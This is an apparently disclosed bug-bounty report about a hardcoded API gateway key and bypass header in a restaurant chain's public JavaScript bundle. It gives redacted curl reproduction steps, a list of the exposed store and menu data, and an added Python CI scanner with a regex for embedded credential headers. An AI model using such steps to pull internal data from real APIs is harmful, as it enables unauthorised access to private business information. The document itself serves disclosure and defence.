Critical Auth Bypass: Hardcoded Internal Headers in JS Bundle
During a deep dive into publicly accessible JavaScript bundles, I discovered a critical authentication bypass vulnerability affecting internal APIs. By abusing a hardcoded security header, I was able to bypass API Gateway filters and access sensitive internal operational data and unreleased product assets.
Impacted Data Details
1. Internal Restaurant Operational Data: access to details for 392 stores, including:
- Internal Status: identification of stores marked as DEAD or CLOSED.
- Management Structure: exposure of internal operational patch names and regional leadership details.
- Real Estate Strategy: access to internal property categories and site performance metrics.
2. Leaked 2025 Menu Innovation & Assets: unauthorized access to the future product roadmap:
- Unreleased Products: details on future marketing campaigns and upcoming meals.
- Marketing Assets: direct links to high-resolution CDN images for 2025 projects.
- Recipe Information: internal descriptions of menu items before public launch.
Steps to Reproduce
1. Extract Secrets
Locate the hardcoded values of the Ocp-Apim-Subscription-Key and x-xxxxx-bypass headers within the publicly accessible app.js file.
2. Retrieve Internal Restaurant Data
Using curl to query the internal service:
curl -X POST "https://xxxxx.com/restaurant/v3/restaurant" \
-H "Ocp-Apim-Subscription-Key: xxxxx" \
-H "x-xxxxx-bypass: xxxxx" \
-H "Content-Type: application/json" \
-d '{"latitude":40.7580, "longitude":-73.9855, "radius":80467, "pageSize":10}'
3. Retrieve 2025 Menu Data
Accessing the menu innovation endpoint:
curl -X GET "https://xxxxx.com/menuinnovation/v1/universalmeals/online" \
-H "Ocp-Apim-Subscription-Key: xxxxx" \
-H "x-xxxxx-bypass: xxxxx"
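The root cause is that the gateway trusts a header any client can send, so the durable fix is server-side: remove the bypass header from the gateway policy and rotate the subscription key. A cheap complementary control is a build-time check that fails CI whenever a shipped bundle embeds those header names with a literal value, which is how the report says the secrets were found. The following scanner is an added example and not part of the original report; the Ocp-Apim-Subscription-Key header name is real (Azure API Management), while the x-<vendor>-bypass pattern is an assumption generalising the redacted x-xxxxx-bypass, and the sample bundle, key and vendor name are constructed.

```python
"""Build-time check: fail if a shipped JS bundle embeds gateway credentials
or internal bypass headers that a client should never hold."""
import re
import sys

# Header names to flag. Ocp-Apim-Subscription-Key is the real Azure API
# Management header; x-<vendor>-bypass is an assumed generalisation of the
# redacted "x-xxxxx-bypass" header in the report. Matches both the object
# literal form  {"Header":"value"}  and the call form  set("Header","value").
HEADER_RE = re.compile(
    r'["\']?(?P<name>ocp-apim-subscription-key|x-[a-z0-9-]+-bypass)["\']?'
    r'\s*[:,]\s*["\'](?P<value>[^"\']*)["\']',
    re.IGNORECASE,
)


def mask(value: str) -> str:
    """Keep only the first and last two characters so a CI log does not re-leak the key."""
    if len(value) <= 6:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def find_hardcoded_headers(bundle_text: str) -> list[dict]:
    """Return one finding per suspect header found with a literal value in the bundle."""
    findings = []
    for m in HEADER_RE.finditer(bundle_text):
        line_no = bundle_text.count("\n", 0, m.start()) + 1
        findings.append({
            "header": m.group("name").lower(),
            "value": m.group("value"),
            "line": line_no,
        })
    return findings


# Constructed sample of a minified bundle; the key, host and vendor name are made up.
SAMPLE_BUNDLE = (
    'var api={baseUrl:"https://api.example.invalid",'
    'headers:{"Ocp-Apim-Subscription-Key":"0123456789abcdef0123456789abcdef",'
    '"x-acme-bypass":"true","Content-Type":"application/json"}};\n'
    'function getMenu(){return fetch(api.baseUrl+"/public/v1/menu",{headers:api.headers})}'
)


def audit(bundle_text: str) -> int:
    """Print masked findings and return 1 if any exist, else 0 (usable as a CI exit code)."""
    findings = find_hardcoded_headers(bundle_text)
    for f in findings:
        print(f"line {f['line']}: {f['header']} = {mask(f['value'])}")
    return 1 if findings else 0


if __name__ == "__main__":
    # Usage: python check_bundle.py dist/app.js   (no argument audits the built-in sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_BUNDLE
    sys.exit(audit(text))
```

Run it against the built bundle in the pipeline step that produces it; a non-zero exit blocks the deploy. Values are masked in the log on purpose, since the CI output is often as widely readable as the bundle itself.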
Impact
- Strategic Business Risk: exposure of upcoming product roadmaps and internal store performance metrics to competitors.
- Social Engineering: disclosure of internal managerial patch names enables targeted phishing attacks against regional leadership.
- Financial Risk: leak of high-value marketing assets and future recipes before official launch.
Note: This vulnerability has been reported and resolved. Always ensure you have permission before testing any target.